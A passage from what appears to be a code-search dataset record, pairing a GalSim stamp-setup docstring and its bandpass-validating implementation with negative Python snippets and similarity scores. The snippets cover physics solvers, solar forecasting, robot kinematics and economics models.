steps\n\n #Gradually increase the coupling constant g and solve iteratively at each step starting from the Taylor approximation from the previous step\n for i in range(n_step):\n var_new=self.newtonraphson(g,var_init)\n der=self.get_derivative(var_new,g)\n #var_init=self.taylor_expansion(g,g_step,var_new)\n var_init = var_new+g_step*der\n g+=g_step\n #print g\n\n #Save variables at current step if evol =True\n if(evol or movingGrid):\n var_evol[i]=var_init\n g_evol[i]=g\n if(movingGrid and i%n_grid==0 and i!=0):\n #Method for obtaining the rapidities starting from the set of Lambda_i\n rf=RootFinder(self.XXZ,var_evol[i]/g_evol[i],g_evol[i],self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap=lm.laguerre()\n rap_evol[i]=np.sort(lm.laguerre())\n for k in range(self.N): grid[k+1]=rap[k]\n grid[0]=10*max(rap)\n elif(movingGrid and i!=0):\n rf=RootFinder(self.XXZ,var_evol[i]/g_evol[i],g_evol[i],self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap_evol[i]=np.sort(lm.laguerre())\n \n \n #One final iterative solution at g=g_fin\n self.solution=self.newtonraphson(g_fin,var_init)\n #Calculate the occupation numbers\n self.occupation=0.5*(-1.-self.solution+g_fin*self.get_derivative(self.solution,g_fin))\n\n #One final calculation of the rapidities\n if(movingGrid):\n rf=RootFinder(self.XXZ,self.solution/g_fin,g_fin,self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap=lm.laguerre()\n self.rapidities=rap\n\n if movingGrid: return [g_evol,var_evol,rap_evol]\n if evol: return [g_evol,var_evol]\n return self.solution", "def __init__(self, t0, t1, hours=(\"00:00\", \"23:45\"),\n forecast_zones=\"DK\", norm=False, TimeResolution=\"15T\"):\n \n self.t0 = t0\n self.t1 = t1\n self.muni_input = forecast_zones\n self.norm = norm\n self.Time = TimeResolution\n self.fc_zones = self._muni_interpreter(self.muni_input)\n self.fc_obj = import_muni_forecast(self.t0, self.t1,\n hours=hours,\n muni_list=self.fc_zones,\n sub_h_freq=self.Time)\n root = return_to_root()\n coef_path = 'scripts/rad_model_development/'\n stem_path = '/data/stem_data/'\n self.all_KNr = np.array(pd.read_excel(root + stem_path +\n 'Kommune_GridNr.xlsx',\n header=0)['Kommune_Nr'])\n \n # Importing season, muni and time parameters\n self.beta = np.load(root + coef_path + 'rad_coef_merge.pickle')\n \n self.season = {}\n self.season['DK'] = self.beta['season']['coef_s'][0:4].reshape((1,4))[0]\n self.season['zones'] = self.beta['season']['coef_s'][4:8].reshape((1,4))[0]\n self.season['munis'] = self.beta['season']['coef_s'][8:12].reshape((1,4))[0]\n \n self.time = {}\n self.time['DK'] = self.beta['time']['coef_t'][0:24].reshape((1,24))[0]\n self.time['zones'] = self.beta['time']['coef_t'][24:48].reshape((1,24))[0]\n self.time['munis'] = self.beta['time']['coef_t'][48:72].reshape((1,24))[0]\n \n self.muni = self.beta['muni']['coef_m'].reshape((1,101))[0]\n \n self.GHI = self.fc_obj.GHI*10**(-3) # Scaled to MW\n self.KNr = self.fc_obj.muninr\n self.hour = (self.fc_obj.GHI.index[0].hour,\n self.fc_obj.GHI.index[-1].hour)\n self.minutes = (self.fc_obj.GHI.index[0].time().minute,\n self.fc_obj.GHI.index[-1].time().minute)\n self.t0 = pd.Timestamp(self.fc_obj.GHI.index[0].date())\n self.t1 = pd.Timestamp(self.fc_obj.GHI.index[-1].date())\n self.IndxSet = self.findIndx()\n self.rng_single_day = pd.date_range(self.t0 +\n pd.Timedelta(hours=self.hour[0],\n minutes=self.minutes[0]),\n self.t0 +\n pd.Timedelta(hours=self.hour[-1],\n minutes=self.minutes[-1]),\n freq=self.Time)\n\n self.rng = pd.date_range(self.t0 + pd.Timedelta(hours=self.hour[0],\n minutes=self.minutes[0]),\n self.t1 + pd.Timedelta(hours=self.hour[-1],\n minutes=self.minutes[-1]),\n freq=self.Time)", "def define_ufl_equations_diff(self):\n\n # Derivatives of velocity integration equation.\n if self.f1 != 0:\n self.df1_du = dlf.derivative(self.f1, self.displacement, self.trial_vector)\n self.df1_dv = dlf.derivative(self.f1, self.velocity, self.trial_vector)\n else:\n self.df1_du = 0\n self.df1_dv = 0\n self.df1_dp = 0 # This is always zero.\n\n # Derivatives of momentum equation.\n if self.displacement != 0:\n self.df2_du = dlf.derivative(self.f2, self.displacement, self.trial_vector)\n else:\n self.df2_du = 0\n\n if self.velocity != 0:\n self.df2_dv = dlf.derivative(self.f2, self.velocity, self.trial_vector)\n else:\n self.df2_dv = 0\n\n if self.pressure != 0:\n self.df2_dp = dlf.derivative(self.f2, self.pressure, self.trial_scalar)\n else:\n self.df2_dp = 0\n\n # Derivatives of incompressibility equation.\n if self.f3 != 0:\n if self.displacement != 0:\n self.df3_du = dlf.derivative(self.f3, self.displacement, self.trial_vector)\n else:\n self.df3_du = 0\n\n if self.velocity != 0:\n self.df3_dv = dlf.derivative(self.f3, self.velocity, self.trial_vector)\n else:\n self.df3_dv = 0\n\n self.df3_dp = dlf.derivative(self.f3, self.pressure, self.trial_scalar)\n else:\n self.df3_du = 0\n self.df3_dv = 0\n self.df3_dp = 0\n\n return None", "def solve_prep(self):\n\n par = self.par\n sol = self.sol\n\n # a. retirement\n sol.m_ret = np.zeros((par.T,par.Nm_ret))\n sol.c_ret = np.zeros((par.T,par.Nm_ret))\n sol.a_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_v_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vm_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vn_ret = np.zeros((par.T,par.Nm_ret))\n\n # b. working\n if par.solmethod == 'G2EGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.ucon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.dcon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.acon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.z = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n \n elif par.solmethod == 'NEGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((0,0,0))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((0,0,0))\n \n sol.c_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))\n sol.inv_v_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))", "def update_position(self, event):\n\n # Create a copy of the most recent stored twist data to perform calculations\n with self.lock:\n velocity_data = copy.deepcopy(self.twist)\n\n # Time elapsed since last update position call\n if hasattr(event, 'last_real'):\n if event.last_real is None:\n time = rospy.Duration(0.05)\n else:\n time = event.current_real - event.last_real\n \n time = time.to_sec()\n\n # Calculate angle turned in the given time using omega = theta/time\n angle = velocity_data.angular.z*time\n\n # Calculate distance travelled in the given time using linear velocity = arc distance/time\n distance = velocity_data.linear.x*time\n\n # Calculate yaw of the robot\n self.vehicle_yaw += angle\n\n # Calculate vehicle x, y, z position coordinates\n # TODO recalculate the position based on traveling in a circular arc.\n self.pose.position.x += (distance)*cos(self.vehicle_yaw)\n self.pose.position.y += (distance)*sin(self.vehicle_yaw)\n\n # Calculate z position using linear interpolation and create cloud array\n \n # 1. Create ranges to be used in interpolation function\n terrain_points_x = np.arange(0, self.gaussian_array.shape[1]*self.resolution, self.resolution)\n terrain_points_y = np.arange(0, self.gaussian_array.shape[0]*self.resolution, self.resolution)\n\n # 2. Create array of points to be converted to point cloud for vizualization\n terrain_mesh_x, terrain_mesh_y = np.meshgrid(terrain_points_x, terrain_points_y)\n terrain_x = terrain_mesh_x.ravel()\n terrain_y = terrain_mesh_y.ravel()\n terrain_z = self.gaussian_array.ravel()\n terrain_grid_points = np.stack((terrain_x, terrain_y, terrain_z), axis=1)\n\n # 3. Create interpolation function based on the ranges and gaussian data\n interp_func = RectBivariateSpline(terrain_points_y, terrain_points_x, self.gaussian_array)\n\n # 4. Find z value for x and y coordinate of vehicle using interpolation function\n # TODO compute z height based on footprint\n self.pose.position.z = interp_func(self.pose.position.y, self.pose.position.x)\n\n # Convert Euler Angles to Quarternion\n V_rotation = tf.transformations.quaternion_from_euler(0.0, 0.0, self.vehicle_yaw)\n\n # Broadcast vehicle frame which is a child of the world frame\n br = tf.TransformBroadcaster()\n br.sendTransform((self.pose.position.x, self.pose.position.y, self.pose.position.z), \n V_rotation, rospy.Time.now(),\"vehicle_frame\", \"map\")\n\n # Construct the homogenous transformation matrix for map to vehicle frame\n V_translation = [self.pose.position.x, self.pose.position.y, self.pose.position.z]\n map_T_V = tf.transformations.quaternion_matrix(V_rotation) \n map_T_V[:3,3] = np.array(V_translation)\n\n # Create footprint of vehicle\n V_footprint_range_x = np.linspace((-self.vehicle_length/2), (self.vehicle_length/2), 30)\n V_footprint_range_y = np.linspace((-self.vehicle_width/2), (self.vehicle_width/2), 15)\n V_footprint_mesh_x, V_footprint_mesh_y = np.meshgrid(V_footprint_range_x, V_footprint_range_y)\n V_footprint_x = V_footprint_mesh_x.ravel()\n V_footprint_y = V_footprint_mesh_y.ravel()\n\n # For every point in the vehicle footprint, calculate the position wrt to the vehicle's frame\n # and its interpolated z value. Add this point to a list of points for visualization.\n # TODO Flatten into a single matrix multiply to remove for loop\n V_viz_points = []\n for i in range(V_footprint_x.shape[0]):\n p = Point()\n V_footprint_point = np.array([[V_footprint_x[i]],[V_footprint_y[i]], [0.0], [1.0]])\n V_footprint_point = np.matmul(map_T_V, V_footprint_point)\n V_footprint_point[2, 0] = interp_func(V_footprint_point[1, 0], V_footprint_point[0, 0])\n p.x = V_footprint_point[0, 0]\n p.y = V_footprint_point[1, 0]\n p.z = V_footprint_point[2, 0]\n V_viz_points.append(p)\n\n #####################################################################################\n # Create a copy of the most recent stored JointState data to perform calculations\n with self.joint_lock:\n joint_data = copy.deepcopy(self.joint)\n\n # If the data is empty on first run, fill with 0.0\n if not joint_data.velocity:\n joint_data.velocity = [0.0,0.0]\n \n # Calculate angle based on velocity data and time\n angle = joint_data.velocity[0]*time\n angle2 = joint_data.velocity[1]*time\n\n self.joint1_pitch += angle\n self.joint2_pitch += angle2\n\n # Transformations from vehicle frame to Joint1 and Joint2\n \n # Static rotation about z-axis \n static_rot = tf.transformations.quaternion_from_euler(0.0, 0.0, 3.14159)\n translation = [0.0, 0.0, 0.0]\n V_T_SRz = tf.transformations.quaternion_matrix(static_rot)\n V_T_SRz[:3,3] = np.array(translation)\n\n # Dynamic rotation about the y-axis of Joint 1\n rot_SRz_T_J1 = [[cos(self.joint1_pitch), 0.0, sin(self.joint1_pitch)],\n [0.0, 1.0, 0.0],\n [-sin(self.joint1_pitch), 0.0, cos(self.joint1_pitch)]]\n\n trans_SRz_T_J1 = [0.0, 0.0, 0.0, 1.0]\n\n SRz_T_J1 = np.zeros((4,4))\n SRz_T_J1[:3,:3] = rot_SRz_T_J1\n SRz_T_J1[:4,3] = trans_SRz_T_J1\n\n # Translation based on length of Joint 1 arm \n no_rot = tf.transformations.quaternion_from_euler(0.0, 0.0, 0.0)\n translation = [self.joint1_length, 0.0, 0.0]\n J1_T_STx = tf.transformations.quaternion_matrix(no_rot)\n J1_T_STx[:3,3] = np.array(translation)\n\n # Dynamic rotation about y-axis of Joint 2\n dynamic_rot2 = tf.transformations.quaternion_from_euler(0.0, self.joint2_pitch, 0.0)\n translation = [0.0, 0.0, 0.0]\n STx_T_J2 = tf.transformations.quaternion_matrix(dynamic_rot2)\n STx_T_J2[:3,3] = np.array(translation)\n\n # matrix multiplication to form the homogenous matrices\n V_T_J1 = np.matmul(V_T_SRz, SRz_T_J1)\n V_T_STx = np.matmul(V_T_J1, J1_T_STx)\n V_T_J2 = np.matmul(V_T_STx, STx_T_J2)\n\n frame_J1 = tf_conversions.fromMatrix(V_T_J1)\n frame_J2 = tf_conversions.fromMatrix(V_T_J2)\n\n # The ripper tip is a point in the J2's frame, this is based on the length of the ripper\n ripper_tip_point_J2 = [self.ripper_length, 0.0, 0.0, 1.0]\n map_T_J2 = np.matmul(map_T_V, V_T_J2)\n ripper_tip_pt_map = np.matmul(map_T_J2, ripper_tip_point_J2)\n ripper_tip_point_viz = Point()\n ripper_tip_point_viz.x = ripper_tip_pt_map[0]\n ripper_tip_point_viz.y = ripper_tip_pt_map[1]\n ripper_tip_point_viz.z = ripper_tip_pt_map[2]\n V_viz_points.append(ripper_tip_point_viz)\n\n # use the ripper's position as an index value to access the gaussian array\n ripper_tip_cell_index_x = int(ripper_tip_pt_map[1]/self.resolution)\n ripper_tip_cell_index_y = int(ripper_tip_pt_map[0]/self.resolution)\n\n # Create a range of index values surrounding index_x and y\n nearby_index_cells_range_x = np.arange((ripper_tip_cell_index_x-1),(ripper_tip_cell_index_x+2), 1)\n nearby_index_cells_range_y = np.arange((ripper_tip_cell_index_y-1),(ripper_tip_cell_index_y+2), 1)\n nearby_index_cells_mesh_x, nearby_index_cells_mesh_y = np.meshgrid(nearby_index_cells_range_x,nearby_index_cells_range_y)\n nearby_index_cells_x = nearby_index_cells_mesh_x.ravel()\n nearby_index_cells_y = nearby_index_cells_mesh_y.ravel()\n\n # First check if the index is within the gaussian array, if it is, then check if the tip of\n # the ripper is beneath the soil, if it is, then remove the soil above the tip and disperse\n # it to the surrounding cells, provided those cells are also within the gaussian array\n # TODO Remove use of for loops and excess if statements\n\n if (0 <= ripper_tip_cell_index_x <= (self.gaussian_array.shape[0]-1)) and (0 <= ripper_tip_cell_index_y <= (self.gaussian_array.shape[1]-1)):\n if (self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] > ripper_tip_pt_map[2]):\n diff = self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] - ripper_tip_pt_map[2]\n for i in range(nearby_index_cells_x.shape[0]):\n if (0 <= nearby_index_cells_x[i] <= (self.gaussian_array.shape[0]-1)) and (0 <= nearby_index_cells_y[i] <= (self.gaussian_array.shape[1]-1)):\n self.gaussian_array[nearby_index_cells_x[i]][nearby_index_cells_y[i]] += diff/8\n self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] = ripper_tip_pt_map[2]\n \n\n # Publish all messages\n self.publish_messages(V_translation, V_rotation, terrain_grid_points, V_viz_points, frame_J1, frame_J2)", "def InitPositions(N, L):\n #make the position array\n Pos = np.zeros((N,3), float)\n #compute integer grid # of locations for cubic lattice\n NLat = int(N**(1./3.) + 1.)\n LatSpac = float(L) / float(NLat)\n #make an array of lattice sites\n r = LatSpac * np.arange(NLat, dtype=float) - 0.5*L\n #loop through x, y, z positions in lattice until done\n #for every atom in the system\n i = 0\n for x in r:\n for y in r:\n for z in r:\n Pos[i] = np.array([x,y,z], float)\n #add a random offset to help initial minimization\n Offset = 0.1 * LatSpac * (np.random.rand(3) - 0.5)\n Pos[i] = Pos[i] + Offset\n i += 1\n #if done placing atoms, return\n if i >= N:\n return Pos\n return Pos", "def calc(self):\n\n # the following if query ensures that volume- and interaction-terms\n # are only calculated if tau > 0.\n # (to avoid nan-values from invalid function-evaluations)\n\n if self.V.tau.shape == (1,):\n Isurf = self.surface()\n # differentiation for non-existing canopy, as otherwise NAN values\n if self.V.tau > 0.:\n Ivol = self.volume()\n if self.int_Q is True:\n Iint = self.interaction()\n else:\n Iint = np.array([0.])\n else:\n Ivol = np.array([0.])\n Iint = np.array([0.])\n else:\n # calculate surface-term (valid for any tau-value)\n Isurf = self.surface()\n\n # store initial parameter-values\n old_t_0 = self.t_0\n old_p_0 = self.p_0\n old_t_ex = self.t_ex\n old_p_ex = self.p_ex\n\n old_tau = self.V._get_tau()\n old_omega = self.V._get_omega()\n old_NN = self.SRF._get_NormBRDF()\n\n # set mask for tau > 0.\n mask = old_tau > 0.\n valid_index = np.where(mask)\n inval_index = np.where(~mask)\n\n # set parameter-values to valid values for calculation\n self.t_0 = old_t_0[valid_index[0]]\n self.p_0 = old_p_0[valid_index[0]]\n self.t_ex = old_t_ex[valid_index[0]]\n self.p_ex = old_p_ex[valid_index[0]]\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically adds an axis to the arrays!\n self.V.tau = np.squeeze(old_tau[valid_index[0]])\n if np.array(self.V.omega).size != 1:\n self.V.omega = np.squeeze(old_omega[valid_index[0]])\n if np.array(self.SRF.NormBRDF).size != 1:\n self.SRF.NormBRDF = np.squeeze(old_NN[valid_index[0]])\n\n # calculate volume and interaction term where tau-values are valid\n _Ivol = self.volume()\n if self.int_Q is True:\n _Iint = self.interaction()\n else:\n _Iint = np.full_like(self.t_0, 0.)\n\n # reset parameter values to old values\n self.t_0 = old_t_0\n self.p_0 = old_p_0\n self.t_ex = old_t_ex\n self.p_ex = old_p_ex\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically add an axis to the arrays!\n self.V.tau = np.squeeze(old_tau)\n self.V.omega = np.squeeze(old_omega)\n self.SRF.NormBRDF = np.squeeze(old_NN)\n\n # combine calculated volume-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n Ivol = np.ones_like(self.t_0)\n Ivol[valid_index[0]] = _Ivol\n Ivol[inval_index[0]] = np.ones_like(Ivol[inval_index[0]]) * 0.\n\n # combine calculated interaction-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n if self.int_Q is True:\n Iint = np.ones_like(self.t_0)\n Iint[valid_index[0]] = _Iint\n Iint[inval_index[0]] = np.ones_like(Iint[inval_index[0]]) * 0.\n else:\n Iint = np.full_like(self.t_0, 0.)\n\n return Isurf + Ivol + Iint, Isurf, Ivol, Iint", "def get_position(self, t0):\n my_pos_x=np.random.uniform(-20, 20)\n my_pos_y=np.random.uniform(-20, 20)\n r=np.array([my_pos_x, my_pos_y])\n x_y=np.zeros(shape=(self.no_planets-1, 2))\n tol=1e-5\n diff=np.zeros(self.no_planets-1)\n for k in range(self.no_planets-1):\n r1=np.linalg.norm(r)\n r2=np.linalg.norm(r-self.positionFunction(t0)[:, k])\n r3=np.linalg.norm(r-self.positionFunction(t0)[:, k+1])\n x1=0\n y1=0\n x2=self.positionFunction(t0)[0,k]\n y2=self.positionFunction(t0)[1,k]\n x3=self.positionFunction(t0)[0,k+1]\n y3=self.positionFunction(t0)[1, k+1]\n x,y,difference=self.triangulate_analytic(x1,y1,r1,x2,y2,r2,x3,y3,r3)\n x_y[k, 0]=x\n x_y[k, 1]=y\n diff[k]=difference\n if (diff > tol).any():\n print diff.max()\n print \"Oh no, one failed :(\"\n sys.exit(1)\n print \"My pos x:\", my_pos_x\n print \"My pos y:\", my_pos_y\n #return x1, y1, r1, x2, y2, r2, x3, y3, r3", "def obj(k_next) : \n \n if method==1 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*linear_interp(k_grid,v_update,k_next))\n elif method==2 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*quad_interp(k_grid,v_update,k_next))\n elif method==3 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*cubic_interp(k_grid,v_update,k_next))\n \n return value_vec", "def initial_parameters(ship_data: dict) -> dict:\n\n mask = df_parameters[\"brix_lambda\"].notnull()\n df_parameters.loc[mask, \"brix_prime\"] = df_parameters.loc[mask].apply(\n calculate_prime, ship_parameters=ship_data, axis=1\n )\n\n df_parameters[\"prime\"] = df_parameters[\"brix_prime\"]\n\n df_parameters.loc[\"Ydelta\", \"prime\"] = 0.003 # Just guessing\n df_parameters.loc[\"Ndelta\", \"prime\"] = (\n -df_parameters.loc[\"Ydelta\", \"prime\"] / 2\n ) # Just guessing\n\n df_parameters.loc[\"Nu\", \"prime\"] = 0\n df_parameters.loc[\"Nur\", \"prime\"] = 0\n # df_parameters.loc[\"Xdelta\", \"prime\"] = -0.001\n df_parameters.loc[\"Xr\", \"prime\"] = 0\n df_parameters.loc[\"Xrr\", \"prime\"] = 0.000\n df_parameters.loc[\"Xu\", \"prime\"] = 0\n df_parameters.loc[\"Xuu\", \"prime\"] = 0\n df_parameters.loc[\"Xv\", \"prime\"] = 0\n df_parameters.loc[\"Xvr\", \"prime\"] = 0\n df_parameters.loc[\"Yu\", \"prime\"] = 0\n df_parameters.loc[\"Yur\", \"prime\"] = 0.00\n\n df_parameters.loc[\"Nuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Xthrust\", \"prime\"] = 1.0\n df_parameters.loc[\"Yrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xvdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yvdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Nvdeltadelta\", \"prime\"] = 0.0\n\n df_parameters.loc[\"Ythrustdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nthrustdelta\", \"prime\"] = 0.0\n\n parameters = df_parameters[\"prime\"].dropna().to_dict()\n\n return parameters", "def initialize_adam(parameters):\n\n\tv = initialize_momentum_velocity(parameters)\n\ts = initialize_momentum_velocity(parameters)\n\n\treturn v, s", "def update(self, tfinal):\n t = 0; kk = 0\n nstep = int(np.round(tfinal/self.dt))+1 # number of time steps\n self.omega = np.zeros((nstep,self.npts))\n self.theta = np.zeros((nstep,self.npts))\n\n while t <(tfinal+1e-10):\n self.return_map()\n self.omega[kk] = self.y[0]\n self.theta[kk] = self.y[1]\n\n self.y = RK4(self.y, self.dt, t, self.deri)\n kk += 1; t += self.dt\n\n return self", "def default_initial_params(self) -> numpy.ndarray:\n\n total_time = self.adiabatic_evolution_time\n step_time = total_time / self.iterations\n hamiltonian = self.hamiltonian\n\n params = []\n for param in self.params():\n if param.letter == 'U':\n p, i = param.subscripts\n params.append(_canonicalize_exponent(\n -0.5 * self.orbital_energies[p] * step_time / numpy.pi, 2))\n else:\n p, q, i = param.subscripts\n # Use the midpoint of the time segment\n interpolation_progress = 0.5 * (2 * i + 1) / self.iterations\n params.append(_canonicalize_exponent(\n -2 * hamiltonian.two_body[p, q] * interpolation_progress *\n step_time / numpy.pi, 2))\n\n return numpy.array(params)", "def initial_projectile_velocity(FinalPositionInX, FinalPositionInY, ReleaseAngle, ShotDepth):\n\tVelocity = sqrt((9.8/2.)*(displacement_in_x(FinalPositionInX,ReleaseAngle,ShotDepth)/cos(ReleaseAngle))**2 \\\n\t\t\t\t/ (displacement_in_x(FinalPositionInX,ReleaseAngle,ShotDepth)*tan(ReleaseAngle) \\\n\t\t\t\t\t- displacement_in_y(FinalPositionInY,ReleaseAngle)))\n\treturn(Velocity)", "def extract_initial_params(self, T1vec: np.ndarray):\n compN = len(T1vec)\n layer_guess = np.random.random(compN)\n layer_guess = layer_guess / layer_guess.sum()\n layer_guess = layer_guess.tolist()\n s0 = 5000 * np.random.rand() + 5000\n x0 = [layer_guess, s0]\n min_val = [np.zeros(compN).tolist(), 5000]\n max_val = [np.ones(compN).tolist(), 10000]\n x0 = np.asarray(x0[0])\n return x0, min_val, max_val" ]
[ "0.6120319", "0.6116722", "0.5932199", "0.5788035", "0.57826406", "0.57638705", "0.5757198", "0.5753652", "0.57429856", "0.57152313", "0.57009196", "0.5668376", "0.5657558", "0.5629421", "0.5624367", "0.5592595", "0.5591798", "0.5582761", "0.5570598", "0.55646664", "0.5564146", "0.55511785", "0.5525184", "0.55204207", "0.55135536", "0.5510296", "0.550398", "0.5463102", "0.5457339", "0.5453269", "0.5450694", "0.5449793", "0.5444014", "0.5440295", "0.54340976", "0.5427834", "0.5425505", "0.541787", "0.5406035", "0.5403882", "0.54030323", "0.53982764", "0.53975207", "0.538244", "0.53763646", "0.5355561", "0.5355561", "0.53527534", "0.53502125", "0.5349311", "0.53380305", "0.53310144", "0.5330321", "0.53298384", "0.53297746", "0.5328105", "0.5316259", "0.53026074", "0.5287349", "0.5284021", "0.5282196", "0.52797544", "0.5268016", "0.52607256", "0.52606326", "0.5253331", "0.52496785", "0.5248526", "0.52385896", "0.5238158", "0.5234131", "0.52327794", "0.52303195", "0.52253664", "0.522312", "0.52211726", "0.52205074", "0.5215534", "0.5210186", "0.5198768", "0.5196101", "0.51959735", "0.51946276", "0.51909506", "0.51887316", "0.5184827", "0.5182282", "0.5181488", "0.5181415", "0.51811194", "0.5180403", "0.5179382", "0.5178509", "0.5177551", "0.51775175", "0.5176769", "0.5172371", "0.51709783", "0.5169441", "0.51642215" ]
0.6997615
0
Do the initialization and setup for building a postage stamp. In the base class, we check for and parse the appropriate size and position values in config (aka base['stamp'] or base['image']. Values given in base['stamp'] take precedence if these are given in both places (which would be confusing, so probably shouldn't do that, but there might be a use case where it would make sense). config The configuration dict for the stamp field. base The base configuration dict. xsize The xsize of the image to build (if known). ysize The ysize of the image to build (if known). ignore A list of parameters that are allowed to be in config that we can ignore here. i.e. it won't be an error if these parameters are present. logger If given, a logger object to log progress. xsize, ysize, image_pos, world_pos
def setup(self, config, base, xsize, ysize, ignore, logger): # .. Do any custom setup you need to do. # Probably want to call the base class setup function to do the normal determination # of the size and position values. # Extra processing of 'bandpass' argument # Most needed type-checking is done in galsim.bandpass self._req_bp_fields = ['throughput', 'wave_type'] self._opt_bp_fields = ['red_limit', 'blue_limit', 'zeropoint'] try: bp = config['bandpass'] for req in self._req_bp_fields: if req not in bp.keys(): raise ValueError('Must pass field {} for a bandpass object!'.format(req)) # for opt in self._opt_bp_fields: # if opt not in bp.keys(): # config['bandpass'][opt] = None for key in bp.keys(): if key not in (self._req_bp_fields+self._opt_bp_fields): raise ValueError('Field {} is not a valid entry for a bandpass!'.format(key)) except KeyError: raise KeyError('`bandpass` is a required field for a COSMOSChromatic stamp!') extra_ignore = ignore + ['bandpass'] return super(self.__class__, self).setup(config, base, xsize, ysize, extra_ignore, logger)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup(self, config, base, file_num, logger):\n # This is a copy of the base class code\n seed = galsim.config.SetupConfigRNG(base, logger=logger)\n logger.debug('file %d: seed = %d',file_num,seed)\n\n if 'det_num' not in config:\n config['det_num'] = { 'type': 'Sequence', 'nitems': 189 }\n\n # Figure out the detector name for the file name.\n detnum = galsim.config.ParseValue(config, 'det_num', base, int)[0]\n if 'camera' in config:\n camera_name = galsim.config.ParseValue(config, 'camera', base, str)[0]\n else:\n camera_name = 'LsstCam'\n camera = get_camera(camera_name)\n if 'only_dets' in config:\n only_dets = config['only_dets']\n det_name = only_dets[detnum]\n else:\n det_name = camera[detnum].getName()\n base['det_name'] = det_name\n if 'eval_variables' not in base:\n base['eval_variables'] = {}\n base['eval_variables']['sdet_name'] = det_name\n\n # Get detector size in pixels.\n det_bbox = camera[det_name].getBBox()\n base['xsize'] = det_bbox.width\n base['ysize'] = det_bbox.height\n\n if 'exptime' in config:\n base['exptime'] = galsim.config.ParseValue(\n config, 'exptime', base, float\n )[0]\n else:\n base['exptime'] = 30.0", "def __init__(self,\r\n default_path = None,\r\n default_level = None,\r\n logging_dir = None,\r\n log_file = None,\r\n log_file_dir = None,\r\n log_conf_full = None\r\n ):\r\n self.logger_is_set = False\r\n\r\n '''\r\n Get ready to setup everything.\r\n TO DO: read from structure is badly needed. \r\n '''\r\n self.default_path = default_path\r\n self.default_level = default_level\r\n self.logging_dir = logging_dir\r\n self.log_file = log_file\r\n self.log_file_dir = log_file_dir\r\n self.log_conf_full = log_conf_full\r\n\r\n\r\n\r\n self.setup_logging(self.default_path,\r\n self.default_level,\r\n self.logging_dir,\r\n self.log_file,\r\n self.log_file_dir,\r\n self.log_conf_full\r\n )", "def __init__(self, grape_config):\n super()\n self.grape_config = grape_config\n # inherit file name and data path from grape config\n self.file_name = grape_config[\"file_name\"]\n self.data_path = grape_config[\"data_path\"]\n log_file = \"{}.out\".format(self.file_name)\n self.log_path = os.path.join(self.data_path, log_file)", "def __init__(self):\n self.config = configs.Configuration()\n self.log = logger.CustomLogger(__name__).get_logger()\n self.output_dir = self.config.getConfigValue('OUTPUT_DIR')\n self.s3_directory = self.config.getConfigValue('S3_FILE_PATH_TRANSFORM')", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(gps_dvl_ins_stamped, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.sample_count is None:\n self.sample_count = 0\n if self.ekf_roll is None:\n self.ekf_roll = 0.\n if self.ekf_pitch is None:\n 